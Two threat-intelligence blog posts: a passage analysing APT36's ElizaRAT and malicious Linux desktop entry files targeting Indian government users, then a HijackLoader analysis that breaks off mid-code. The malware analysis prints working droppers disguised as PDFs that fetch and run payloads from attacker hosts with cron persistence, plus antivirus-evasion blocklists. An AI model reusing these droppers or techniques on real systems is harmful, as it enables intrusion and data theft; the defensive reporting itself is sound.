<command>*<username>*<arguments> C2 Commands All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before the execution of any command, the RAT extracts the username from the C2 command and compares it with the infected machine's username. The command is executed successfully only if both the values match. The following C2 commands are supported by the bot: Table 1: C2 commands supported by Telegram bot C2 COMMAND FUNCTIONALITY /dir Fetches the list of files in the specified directory. /upload Uploads the specified file from the victim’s machine. /getprocess Gets the list of processes running on the victim’s machine. The list is returned in a file with the name getproc.dll . /run Executes the specified program on the victim’s machine. /delete Deletes the specified file. /end Kills the specified processes on the victim’s machine. /online Checks whether the infected machine is online. /identity Connects to the specified website from the victim’s machine and sends a response to the threat actor. This can be used to fetch the machine’s IP address by supplying a parameter like hxxps://api.ipify[.]org . /ping Checks internet connectivity from the victim’s machine to the specified website. /scr Takes a screenshot of the victim’s machine and sends it to the threat actor in a file named scr.dll . /createdir Creates a directory on the user’s machine. Persistence In order to achieve persistence on the infected machine, the bot creates a Windows shortcut file (LNK) in the Windows Startup directory. The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the "orig_name" setting defined in the config. In this case, the shortcut file is called TextSource.lnk. Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence. The description of this shortcut file is set to "Text Editing APP for Windows" to disguise it as a text editing application, making it seem innocuous. In addition, the target command line is set to execute the Control panel applet using rundll32 . Displaying Decoy Content The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary. The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file. Figure 4: Decoy PDF file displayed to the user. Malicious Linux Desktop Entry Files as New Attack Vectors The utilization of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be utilized in very low-volume attacks. So far, our research team has discovered three samples - all of which have 0 detection on VirusTotal. We first observed an occurrence in May 2023 when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files. National Informatics Center (NIC), India Phishing Attack - May 2023 In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel. We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/ URL. From here, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file. Here are some technical details about this case: ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434 ZIP filename: Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac Desktop entry filename: Delegation_Saudi_Arabia.desktop Desktop entry file analysis We found the following content in the desktop entry file: [Desktop Entry] Encoding=UTF-8 Name=Delegation_Saudi_Arabia.pdf Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2 h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1 LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn BkZiB8IC4vMTg1LmVsZg==' | base64 -d | sh" Terminal=false Type=Application Icon=x-office-document The icon of this desktop entry file is set to "x-office-document" to seem like an innocent Office document. The base64-encoded command present inside the desktop entry file decodes to: /usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf | ./185 The command decoded above performs the following actions: 1. Downloads the decoy PDF and saves it in the /tmp directory with the filename: Delegation_Saudi_Arabia.pdf . 2. Downloads the Linux payload and saves it in the /tmp directory with the filename: 185.elf . 3. Marks the Linux binary as executable. 4. Uses LibreOffice to open and display the decoy PDF file. 5. Executes the Linux payload. In this case, the Linux payload was a cross-platform binary designed to run on both Linux and WSL (Windows Subsystem for Linux) machines. Since it did not contain a fully functional C2 mechanism at the time of analysis, we believe it was still in a development phase and used by the threat actor as an initial test. To read about “Lee” agent’s cross-platform capabilities, visit the Lumen blog. The content inside the decoy PDF file is displayed in the image below. Figure 5: Decoy PDF displayed to the user. The PDF appears to be a document from the Indian Ministry of Defence describing the visit of nine members of a delegation from Saudi Arabia, where they discussed issues with Indian Armed Forces medical officials. Inflated File Attack - June 2023 Beginning in June 2023, we detected APT36 establishing their operational infrastructure on a server with the IP address The threat actor proceeded to register multiple domains hosted on this IP. Further insight into this attacker-controlled infrastructure is available in the Threat Actor Infrastructure section. In August, we noted a significant development where few of these domains served as the hosting platform for decoy PDF files. These PDFs were linked within the malicious Linux desktop entry files, which the threat actor distributed enclosed in zip archives. Here are some technical details about this case: ZIP archive MD5 hash: 36b19ca8737c63b9c9a3365ff4968ef5 ZIP filename: Desktop entry file MD5 hash: 65167974b397493fce320005916a13e9 Desktop entry filename: approved_copy.desktop Desktop entry file analysis The first anomaly we observed was the large size of the Linux desktop entry file. A size larger than 1 MB for a Linux desktop entry file is rare. Reviewing the file revealed that the threat actor inflated the size of the file by adding more than a million "#" characters. We believe this was an attempt by the threat actor to bypass security scanning solutions. The image below shows the extra characters added to the inflated Linux desktop entry file. Figure 6: The inflated Linux desktop entry file. The relevant content from the Linux desktop entry file is shown below. [Desktop Entry] Type=Application Name=approved_copy.pdf Exec=bash -c "xdg-open 'https://admin-dept[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.133[.]222/zswap-xbusd -O ~/.local/share/zswap-xbusd && chmod +x ~/.local/share/zswap-xbusd; echo '@reboot ~/.local/share/zswap-xbusd'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt; ~/.local/share/zswap-xbusd" Icon=application-pdf Name[en_US]=approved_copy.desktop This desktop file performs these main operations: Downloads the decoy PDF file from the https://admin-dept[.]in/approved_copy.pdf URL and displays it to the victim. This decoy file contains an error message to distract the user. Figure 7 shows that the icon of this desktop file is set to application-pdf which is done to disguise the malware as an innocuous file. Creates a hidden directory path called, local/share, in the user's home directory. Downloads the Linux payload from the URL 64.227.133[.]222/zswap-xbusd using wget. Saves it as zswap-xbusd in the previously created hidden directory. Writes a short shell script to the file /dev/shm/myc.txt. The shell script reboots the machine and then launches the Linux payload. Sets up a cron job under the current username to run the contents of the /dev/shm/myc.txt script. Deletes the shell script. Executes the Linux payload. Figure 7: The icon of the desktop configuration file is set to PDF to make it more convincing. At the time of our analysis, the server 64.227.133[.]222 was not serving the Linux payload. We continued monitoring this infrastructure and noticed that on Aug 29, 2023, a new domain called admin-br[.]in was registered and used to distribute a new Linux desktop entry file. In this instance, we were able to retrieve the payloads and conclude the threat attribution to APT36. Here is metadata from the new Linux desktop entry file: MD5 hash: 574013c4a22ca2d8d8c76e65ef5e8059 Filename: approved_copy.desktop The relevant content from the Linux desktop entry file is shown below. [Desktop Entry] Type=Application Name=approved_copy.pdf Exec=bash -c "xdg-open 'https://admin-br[.]in//approved_copy.pdf' && mkdir -p ~/.local/share && wget 64.227.138[.]127/4200f0916f146d2ac5448e91a3afe1b3/pickle-help -O ~/.local/share/pickle-help && chmod +x ~/.local/share/pickle-help;~/.local/share/pickle-help >/dev/null 2>&1 & sleep 5; wget 134.209.159[.]9/4200f0916f146d2ac5448e91a3afe1b3/ziputils-help -O ~/.local/share/ziputils-help && chmod +x ~/.local/share/ziputils-help; echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt;echo '@reboot ~/.local/share/ziputils-help'>>/dev/shm/myc.txt; crontab -u `whoami` /dev/shm/myc.txt; rm /dev/shm/myc.txt;~/.local/share/ziputils-help &" Icon=application-pdf Name[en_US]=approved_copy.desktop The functionality of this file is similar to the previous Linux desktop entry file. The image below shows a decoy PDF file displaying an error message stating “Failed to load the PDF document”. This is used to distract the user while malicious activities occur in the background. Figure 8: The decoy PDF file displayed to the user. In this case, the Linux desktop entry file retrieves the malicious Linux payloads from the servers at: 64.227.138[.]127 134.209.159[.]9 The two files retrieved are cleverly named to disguise themselves as legitimate software utilities. Here is the metadata of Linux payloads: MD5 hash: 98279047a7db080129e5ec84533822ef Filename: pickle-help MD5 hash: 248d4e6bb0f32afd7a1cfb975910235a Filename: ziputils-help A quick technical analysis determined these Linux payloads as Mythic Poseidon binaries. Since Mythic is an open-source framework that is well-documented on GitHub, we will not explore its technical details in this blog. The corresponding C2 servers extracted from each malicious Linux payload are listed below. Table 2: C2 servers from malicious Linux payload C2 IP ADDRESS PORT 108.61.163[.]195 7443 64.176.40[.]100 7443 The C2 panel for Mythic Poseidon can be accessed by visiting the URI path /new/login on the server running at port 7443. For instance, the C2 panel for 108.61.163[.]195 can be accessed at hxxps://108.61.163[.]195:7443/new/login . Figure 9: The Mythic C2 panel for the Poseidon binary. New Python-Based Cyber Espionage Utilities Targeting Linux During our analysis, we also discovered new Python-based ELF binaries used by APT36 for the purpose of cyber espionage. These binaries target the Linux environment in the Indian government organizations and are named to seem like legitimate Linux system services. In this section, we review two types of cyber espionage tools discovered by our research team. GLOBSHELL - Custom-built File exfiltration Linux utility The espionage tool under analysis includes this metadata: MD5 hash: 3c3c9303ae33f3bae2e139dbb1db838e Filename: rcu-tasks-kthread This ELF binary was compiled using PyInstaller. We extracted the decompiled Python code to understand its functionality. The image below shows the decompiled code. Figure 10: The decompiled code of Python-based cyber espionage tool type 1. These are the key operations performed by this script: The script contains a predefined list of file extensions which are scanned for in the /media directory recursively. The list of file extensions includes various types like image files, MS Office files, LibreOffice, and PDF. Once the list of files is built, it copies the files to a hidden directory in the path: ~/.config/bossconfig/usnconfig/ The content inside this directory is archived into a ZIP file called . Data is exfiltrated to the URL hxxp://baseuploads[.]com/myf/test.php in an HTTP POST request. Along with the ZIP file, the machine's username, hostname, and the current timestamp are sent. We found another ELF binary called mm-precpu-wq with the same functionality as the ELF binary discussed above. However, this binary included a more in-depth predefined list of file extensions and file paths which it scans to exfiltrate files. In addition to the /media directory, this binary also searches the following paths: /home/{user}/Downloads/**/ /home/{user}/Documents/**/ /home/{user}/Desktop/**/ /home/{user}/Pictures/**/ /home/{user}/.local/share/Trash/**/ PYSHELLFOX - Custom-built Firefox session stealing Linux utility The second type of cyber espionage tool we discovered steals the Firefox browser session details of the user if the user has a browser tab open with any of the following titles or URLs: inbox As is evident from this list, the threat actor is interested in exfiltrating the user's Indian government inbox details as well as WhatsApp conversations. The image below shows the relevant code section which does this. Figure 11: The decompiled code Python-based cyber espionage tool type 2. The espionage tool under analysis includes this metadata: MD5 hash: c86f9ef23b6bb200fc3c0d9d45f0eb4d Filename: events-highpri These are the key operations performed by this script: Fetches the list of all the live Firefox sessions by scanning the path .mozilla/firefox/*default*/sessionstore-backups/recovery.js* . For each file on the list, the code locates the file containing the magic bytes, mozLz40\x00, as the first 8 bytes. Uses LZ4 decompression to extract the JSON data from the magic bytes file. This JSON data has details about the windows and tabs in the current live Firefox session. Iterates over every tab in every Firefox window, extracting the title and the URL from each tab. Then, the code checks if they match any value in the predefined list mentioned earlier. If and when it finds a match, the code archives the ~/.mozilla/firefox directory content into the /dev/shm/ ZIP archive. Uploads the ZIP archive to hxxp://baseuploads[.]com/myf/test.php in an HTTP POST request. In addition to uploading the data, the code also uploads the username, hostname, and current timestamp. Reasons for New Linux-Based Attack Vectors Why is APT36 suddenly adding new attack vectors for the Linux environment? Historic and widespread usage of Linux in the Indian government sector: Linux-based operating systems are widely used in the Indian government sector. The Debian-based operating system, BOSS (Bharat Online Software Solution), developed by CDAC is used across various state ministries and even the Indian defense forces. For more details about the usage of Linux Boss in India, visit the Ministry of Electronics & Information Technology. Expanding into government-related verticals: The recent announcement by the Indian government introduces Maya OS, a Debian Linux-based operating system that will replace Microsoft Windows OS across government and defense sectors. Consequently, there is now a substantial incentive for APT36 and other nation-state threat actors, known for targeting India, to incorporate new attack vectors and Linux payloads into their arsenal. The ubiquitous use of Linux-based systems in more verticals means more potential victims. Threat Attribution We attribute these new Windows and Linux-based attacks to APT36 because their method of serving decoy PDF files, the metadata and their Linux commands are almost identical to previous attacks, which are known and linked to APT36. In addition to this, there is also a C2 infrastructure overlap with previous APT36 attacks which we describe in more detail in the corresponding section. Decoy PDF files The decoy PDF file which is dropped in the same directory as the malicious DLL on the victim's machine by ElizaRAT. The metadata of this PDF file indicated the author as "Apolo Jones" and the PDF file itself was generated with Microsoft Office Word. Both these indicators align with our technical analysis of APT36 from November of 2022. In addition to this, the decoy PDF files downloaded from the attacker-controlled servers in the campaign targeting the Linux platform share the same metadata as well. Linux commands While the attack vector used to distribute the Linux payload is entirely new in this campaign, the Linux commands and file paths used in the desktop entry files share similarities with the previous APT36 campaign used to distribute Linux payloads. In March 2023, APT36 used a Python-compiled ELF binary to target the Linux environment in the Indian government sector. You can read about it on the Uptycs blog. By comparing the Linux commands used in the decompiled Python code in March 2023 and the Linux commands used in the latest desktop entry files (in August 2023), we can see a clear similarity. The figure below shows a side-by-side comparison of the two. Figure 12: A side-by-side comparison of Linux commands from the March 2023 and August 2023 campaigns executed by APT36. Here is a list of similarities between both cases: A hidden directory path structure is created in the location: ~/.local/share . A short shell script responsible for rebooting the machine and executing the Linux payload is written to /dev/shm/ . The same crontab command is executed. The shell script is deleted. The sequence of commands is similar. Threat Actor Infrastructure In the APT36 attacks observed since April 2023, the threat actor has taken extensive measures to conceal any connection to Pakistan by making it seem that the infrastructure is controlled by a threat actor in India. We assess, with a high-confidence, that this is not a coincidence but rather an intentional deception tactic used by APT36 to avoid the attacks from being attributed to Pakistan. Registrant Country of C2 Domains Beginning in June 2023, the threat actor started registering several domains on a server with the IP address The IP address is related to the Hostinger ASN. This infrastructure was involved in the attacks distributing malicious Linux desktop entry files discussed earlier. While the WHOIS information for all these domains is redacted, we can still see the registrant country. For most of the domains, the threat actor took sufficient measures to ensure the registrant country is India (IN). However, for one of the domains, admindesk[.]in, we can see the registrant country is PK (Pakistan). The figure below shows examples of WHOIS information for two of the domains registered by the threat actor on the same infrastructure and used in the same attack. Figure 13: A side-by-side comparison of the WHOIS info from two attacker-registered domains related to same campaign and infrastructure. We believe this was an OPSEC mistake by the threat actor. C2 Infrastructure Overlap There is a C2 infrastructure overlap between the latest campaign and the previous instances of attacks by APT36. In 2022, the server with IP address 153.92.220[.]48 was used to host the domains below which are registered by APT36: Govscholarships[.]in Kavach-apps[.]com Kavach-app[.]in Rodra[.]in ksboard[.]in In the latest instance, a server with IP address: 153.92.220[.]59 was used to host the C2 domains. Both the IP addresses belong to the same subnet: These IP addresses belong to the ASN - AS 47583 (Hostinger) which has been abused by APT36 in the past. Email Associated with Malicious Google Drive Links ElizaRAT is distributed using malicious Google Drive links. Leveraging the Google Drive ID from the links, we gathered additional information about the owner of the Google Drive and the corresponding email address. The image below shows the information we retrieved. Figure 14: A Google Drive link details revealing owner information. The email address and owner name associated with the Google Drive link was: Email address: [email protected] Owner namer: "Nand Kishore" Because “Nand Kishore” is a common name in India, the fake owner was added to implicate a threat actor from India, not Pakistan - where APT36 originates. Attacker-Controlled Server IP Addresses In a few instances, threat actors distributed malicious Linux desktop entry files where the embedded payloads were hosted on servers located in India. This tactic of using servers in the same region as the targeted country for mounting attacks is another deceptive technique employed by APT36. Here is a list of the IP addresses of four servers hosting the malicious Linux payloads: 103.2.232[.]82 64.227.133[.]222 64.227.138[.]127 134.209.159[.]9 Top Level Domain (TLDs) of Malicious Domains In all of the attacks we reviewed for this blog, the TLD was always set to .in - corresponding with the country of India. Another tactic used by APT36 in a few cases is to disguise bad URLs as official Indian government-related web addresses. Conclusion Our research team is actively monitoring the C2 infrastructure of APT36, which is used to register new domains that are used in attacks targeting the Linux environment. The infrastructure continues to be active at the time of this blog publication. We have included a comprehensive list of indicators of compromise (IOCs) at the end of this blog and we urge the research community to update their detection. We have also done a proactive responsible disclosure to the National Informatics Centre (NIC), India with IOC details and the associated threat intelligence. APT36’s introduction of new file formats, new attack vectors, and a new backdoor to the arsenal suggests that they are actively updating their tactics, techniques, and procedures (TTPs). In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Zscaler Coverage Zscaler's multilayered cloud security platform detects indicators at various levels. Win32.RAT.ElizaRAT Win64.RAT.ElizaRAT Linux.Payload.GLOBSHELL Linux.Payload.PYSHELLFOX Linux.Backdoor.Mythic The image below shows the sandbox detection for the new Windows RAT (ElizaRAT) used in the attack. MITRE ATT&CK TTP Mapping ID TACTIC TECHNIQUE T1218.002 System Binary Proxy Execution: Control Panel ElizaRAT is distributed in the form of Control Panel applet file format (cpl). T1567.002 Exfiltration Over Web Service ElizaRAT uses the Telegram API for C2 communication. T1564.001 Hide Artifacts: Hidden Files and Directories Linux desktop entry file downloads and drops binaries in hidden directories. T1036 Masquerading: Match Legitimate Name or Location Linux desktop entry file downloads and drops binaries in hidden directories. T1027.001 Obfuscated Files or Information: Binary Padding More than a million “#” characters are added to the Linux desktop entry file to inflate its file size and potentially bypass security scanning solutions. Indicators of Compromise (IOCs) Windows Platform MD5 HASH BINARY NAME b14884744cf3f86f6bd5a87f6bcbed85 NotepadPlus.cpl a37d9aa1e165b9dc6c4ff396a9df49aa NotepadPlus.cpl 62ee540334236723136bf0fecfeb6311 NotepadPlus.cpl b89990ec5fe9b5cef59f1cd690403a75 NotepadPlus.cpl 9cc4c6ca7826c0771cfbdf27b2bbb515 NotepadPlus.cpl fc99daa2e1b47bae4be51e5e59aef1f0 AgendaMeeting.cpl 66a69bf967bb882e34b1c32081a9ccee TextSource.cpl a279035702edd9f2507b5ce5fa69c6d4 Agenda_Meeting.cpl 1741147a31526e23798a7a1b702ade36 Agenda_Meeting.rar Linux Platform Linux desktop config files and Poseidon binaries MD5 HASH BINARY NAME 65167974b397493fce320005916a13e9 approved_copy.desktop 574013c4a22ca2d8d8c76e65ef5e8059 approved_copy.desktop 36b19ca8737c63b9c9a3365ff4968ef5 9c66f8c0c970822985600bed04e56434 f27a4968af4ed64baef8e086516e86ac Delegation_Saudi_Arabia.desktop 98279047a7db080129e5ec84533822ef pickle-help 248d4e6bb0f32afd7a1cfb975910235a ziputils-help Linux Python-compiled cyber espionage tools MD5 HASH BINARY NAME 3c3c9303ae33f3bae2e139dbb1db838e rcu-tasks-kthread 7608c396f0dfb9eac8d88a7b5a7e04e4 mm-precpu-wq c86f9ef23b6bb200fc3c0d9d45f0eb4d events-highpri 6a2243837c71d8071523cc76b8d4af43 nm_applet 8e4f65d5d58fca38a6d66a1afb228f20 xdg-user_dirs Attacker Infrastructure The domains and URLs below are involved in the attacks used to target Linux environments with desktop entry files. Notice how all of them are using “.in” as the TLD. admincell[.]in admin-dept[.]in coordbranch[.]in adminbr[.]in coordbr[.]in admin-desk[.]in admindesk[.]in adminsec[.]in admindept[.]in admin-br[.]in hxxps://email9ov[.]in/VISIT_OF_MEDICAL/ hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/ The domains and URLs below are related to the Python-based cyber espionage tools. baseuploads[.]com baseuploads[.]com/myf/test.php indiauc[.]com indiauc[.]com/myf/test.php The URLs used to host the password-protected archive files distributing ElizaRAT: hxxps:// hxxps:// Tue, 12 sep 2023 13:22:21 -0700 Sudeep Singh Technical Analysis of HijackLoader Introduction HijackLoader is a new malware loader, which has grown in popularity over the past few months. Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have. Based on our telemetry, we have observed HijackLoader being used to load different malware families such as Danabot, SystemBC and RedLine Stealer. In this blog, we examine the inner workings of HighjackLoader, from its initialization to modular design to anti-analysis techniques. Key Takeaways - HijackLoader is a new malware loader that ThreatLabz first observed in July 2023. - The loader is being leveraged to drop numerous malware families, including Danabot, SystemBC, and RedLine Stealer, amplifying its potential threat. - HijackLoader utilizes syscalls to evade monitoring from security solutions, detects specific processes based on an embedded blocklist, and delays code execution at different stages. - The malware uses embedded modules that facilitate flexible code injection and execution - a feature uncommon among traditional loaders. Technical Analysis The following sections describe each stage and component of HijackLoader. It should be noted that the analysis focuses on one of the many samples observed by ThreatLabz. As a result, certain parts of the analysis might differ from sample to sample (e.g. structure field offsets). First Stage Loader Initialization Phase Upon execution, HijackLoader starts by executing a modified (hooked) function of the Windows C Runtime (CRT), which points to the entry point of the first stage. During its initialization phase, the loader determines if the final payload has been embedded in the binary or if it needs to download it from an external server. To achieve this, HijackLoader includes an encrypted configuration, which stores information such as: A DWORD hash value to detect the next stage (e.g., the ti module described later in the text) from the modules table. Windows API hashes for dynamic loading. An array of DWORDs, which are used to determine if the loader has to download the final payload. The offsets for these fields might differ from sample to sample. Parameters for several Windows API functions. For example, the constant PAGE_EXECUTE_READWRITE (0x40) for VirtualProtect. A DWORD seed value, which is used for deriving a string based on the compromised host’s username. A DWORD value, which is used for validating the payload, when loaded from disk, by searching it in the payload’s data. A DWORD value, which is used for detecting all blobs of the encrypted payload. An offset for the payload URL (if any) along with an XOR key to decrypt it. A blocklist of process name hashes (described later in Table 1). The above configuration block is detected by using hardcoded offsets and then decrypted either with a bitwise XOR or ADD operation. The offsets for the configuration block detection (including the offset of the encryption key) might differ from sample to sample. Anti-Analysis The first stage includes a limited set of evasion techniques: Dynamic loading of Windows API functions by leveraging a custom API hashing technique. Performing an HTTP connectivity test to a legitimate website (e.g. If a connection cannot be made, then HijackLoader does not proceed with the execution and enters an infinite loop until a connection is made. Delaying of code execution at different stages. The first stager checks for the presence of a set of running processes. Depending on which ones are present, it executes different functionality. In Table 1, we summarize the corresponding functionality for each process. Table 1 - HijackLoader blocklist of processes PROCESS NAME PRODUCT NAME DESCRIPTION avastsvc Avast Antivirus Delay execution for 40 seconds. avgsvc AVG Internet Security Delay execution for 40 seconds. a2service Emsisoft Anti-Malware Skip the connectivity test. wrsa Webroot SecureAnywhere Skip the connectivity test. msmpeng Microsoft Windows Defender No behavioral code change. Second Stage Loading HijackLoader locates the payload of the second stage (i.e., the ti module) by following the steps below: Parses the decrypted configuration block, which was obtained from the initialization phase. Then, HijackLoader locates the encrypted payload URL and decrypts it using a bitwise XOR operation. Downloads the payload and validates it by checking for the presence of the signature (included in the configuration block) in its data. If the validation passes, it writes it to disk. Searches for encrypted blobs using the second marker. Each marker represents the start of an encrypted blob along with the size of the blob (which is stored before each occurrence). Moreover, the XOR key is located after the offset of the first encrypted blob. Once all encrypted blobs have been extracted, they are concatenated together and decrypted with the XOR key. Finally, the decrypted payload is decompressed using the LZNT1 algorithm. Pseudocode for this process is shown in Figure 1. Figure 1: HijackLoader second stage code to download and execute payloads The same procedure is followed when the payload is loaded from disk. The only difference is that HijackLoader uses an additional pattern (from the configuration block) for finding the start offset of the embedded payload (Figure 2). Figure 2: HijackLoader second stage payload execution from a local file The decrypted payload includes two components: A modules table - This includes the HijackLoader modules along with their settings and the final payload (e.g. SystemBC). Main shellcode and settings, or a list of optional files to use for DLL hijacking. Next, the first stager needs to load and execute the next stage. This is accomplished by obtaining the file path of the DLL to patch (e.g. mshtml.dll) and a table for the modules of HijackLoader that is included in the decrypted payload. Then, HijackLoader loads the specified DLL and locates the next stager (ti module) after searching for its hash (included in the configuration block) in the modules table. Lastly, it copies the module’s data into the code section of the legitimate DLL and executes it. NOTE: The file paths and names of files that are written to disk by HijackLoader are generated based on the username of the compromised host. Modules HijackLoader’s modules assist with the code injection and execution process of the final payload. The table below shows the modules identified by ThreatLabz, along with the corresponding CRC32 values and functionality. Table 2 - HijackLoader modules observed by ThreatLabz CRC32 MODULE NAME DESCRIPTION 0x78b783ca AVDATA Blocklist of security products’ process names. The blocklist includes the CRC32 value of each process name. 0x757c9405 ESAL Clears out the shellcode data and executes the final payload. 0x6364a15b ESAL64 64-bit version of the ESAL module. 0xe7794e15 ESLDR Assists with code injection of the main instrumentation shellcode. 0x4fa01ac5 ESLDR64 64-bit version of ESLDR module. 0x93eb1cb1 ESWR Clears out the shellcode data and executes the rshell module. 0x699d0c82 FIXED Legitimate executable file (e.g., QQPCMgr), which is used for injecting code into its process. 0xfea2e0eb LauncherLdr Decrypts the stored modules table file from disk. We have only seen the 64-bit version of this module being included. 0xf4f141c2 LauncherLdr64 64-bit version of LauncherLdr module. 0x74984889 rshell Relocates, parses and executes the final payload. 0x7b37e907 rshell64 64-bit version of rshell module. 0x3ee477f1 ti Executed after the first stage. Performs code injection for other stages and modules. 0x2ab77db8 ti64 64-bit version of ti module. 0x4eace798 tinystub Empty executable file, which is used for patching during the final payload execution process. 0xa1d724fc tinyutilitymodule.dll Overwrites the PE headers of a specified file with null bytes. 0x263596ba tinyutilitymodule64.dll 64-bit version of tinyutilitymodule.dll module. 0x1ae7700a Unknown Unknown module. Not included in any of the observed binaries. Based on the analyzed code, we assess that it includes a file path along with an optional parameter. The current running file is copied into this new location and executed along with the specified parameter. N/A Main instrumentation shellcode Shellcode injected into the specified target process from the ti module. This module is responsible for executing the final payload. Moreover, each module has a structure that holds information such as: Module name Module offset in the table Module size Due to the quality of the code and because the rest of the structure fields are not being used, ThreatLabz was not able to identify the purpose for the rest of the structure members. However, ThreatLabz assesses that the following information might be included as well: Module timestamp Internal names (e.g., rLdr64 for the rshell module) From the modules mentioned above, our analysis focused on the ti and the main instrumentation shellcode modules since these two implement the majority of the core functionality for HijackLoader. TI module Anti-Analysis The anti-analysis techniques are the same as presented in the previous section, but there are two notable differences: The developers have included the Heaven's gate technique. The process blocklist remains the same but the code behavior is different as can be seen in Table 3. Table 3 - Process blocklist in the HijackLoader ti module PROCESS NAME DESCRIPTION avastsvc Adds persistence by creating a shortcut (LNK) file and saving the current executable under a random filename in the Windows folder %AppData%. NOTE: A flag, which is set in the decrypted payload at offset 4 is required too. Generates a random environment variable name with seed 0xE1ABD1C2 and a new random filename. This is used at a later stage for storing the modules table. Writes to disk a legitimate executable file (the FIXED module) and uses it for code injection at a later stage. avgsvc Same as avastsvc a2service No behavioral code change. wrsa No behavioral code change. msmpeng No behavioral code change. Execution Phase The primary role of the ti module is to inject the main instrumentation module, which is responsible for loading the final stage. The ti module executes the next stage by using one of the following methods: Re-executes the initial file from a new location and parameter (if the module with the CRC32 value 0x1ae7700a exists). Creates a new process (specified in the configuration), maps the hijacked file into it (e.g. mshtml), and injects the main instrumentation shellcode. In addition (depending on the configuration flags), it executes the FIXED module, which might be used later for code injection. HijackLoader might include an additional set of files, which can be used for DLL hijacking. In this case, it writes them to disk along with the encrypted payload (from stage 1) and executes the hijacked executable. Executes the ESLDR module, which injects the main instrumentation shellcode. Main Instrumentation Module The main instrumentation module contains the core functionality for loading and executing the final stage of the infection chain. Anti-Analysis The anti-analysis techniques remain the same with the previous aforementioned stages. However, one key difference is the deployment of the AVDATA module. The AVDATA module contains a set of process names and if any of them are detected then the code behavior might change. The process names observed by ThreatLabz and their CRC32 values are presented in the table below. Table 4 - Process name blocklist in the HijackLoader AVDATA module CRC32 PRODUCT NAME PROCESS NAME 0xb02ef94 Avast Antivirus avastsvc.exe 0xc0bfbba0 ESET Smart Security ekrn.exe 0x40cb21d3 Kaspersky AntiVirus avp.exe 0xc0fe273f Symantec Event Manager ccsvchst.exe 0x9e0539f6 Norton 360 n360.exe 0xe6ef3ab Avira avguard.exe 0x8e9e8add AVG Internet Security avgsvc.exe 0x923d5594 AVG Internet Security avgui.exe 0xce1599c2 BitDefender AntiVirus vsserv.exe 0x83ed98a3 BitDefender AntiVirus epsecurityservice.exe 0xd50dea99 TrendMicro AntiVirus coreserviceshell.exe 0x2fba3706 McAfee Antivirus mcshield.exe 0x1235ed11 McAfee Antivirus mctray.exe 0x3a39ba4 Norton Internet Security nis.exe 0xe981e279 Norton Internet Security ns.exe 0x19e8fad2 BitDefender Antivirus bdagent.exe 0x5f1c2fc2 Trend Micro Security uiseagnt.exe 0xc68b2fd8 ByteFence Anti-Malware bytefence.exe 0xefba2118 McAfee Security Scan Plus mcuicnt.exe 0xfeb42b97 Internet Security Essentials vkise.exe 0x6274fa64 Comodo Internet Security cis.exe 0x4420ef23 Malwarebytes Anti-Malware mbam.exe 0x31c100e7 360 Safe Guard zhudongfangyu.exe 0x219b199a 360 Total Security 360tray.exe 0x64760001 N/A Unknown 0x27873423 N/A Unknown 0x8bdc7f5b N/A Unknown Each process block in the AVDATA module has the following structure: struct avdata_process_block { unsigned int CRC32; // CRC32 value of process. unsigned char Execution_Type; // Code execution method for the final payload. unsigned char LNK_Persistence_Flag; // Adds persistence with an LNK shortcut file. unsigned char unknown; // Not used. unsigned char unknown_2; // Not used. int BITS_Persistence_Flag; // Adds persistence by creating a BITS job. int unknown_3; // Not used. int unknown_4; // Not used. int Injection_Type; // Defines what code injection method to use. int overwrite_pe_headers_with_junk_Flag; // Used during module deployment. }; Persistence As described in the structure above, persistence on the compromised host is established via the following methods: Creation of a BITS job, which points to the executable file. Creation of a shortcut file (LNK) in the Windows Startup folder. The shortcut’s path is added in a new BITS job and points to the executable file. Final payload decryption and execution The embedded payload is decrypted using a bitwise XOR operation with the key being derived from the first 200 bytes. This can be easily represented in Python as follows: enc_data = data[200:] key = data[:200] dec = bytearray() for idx in range(0, len(enc_data), 4): dec_int = struct.unpack("<L", 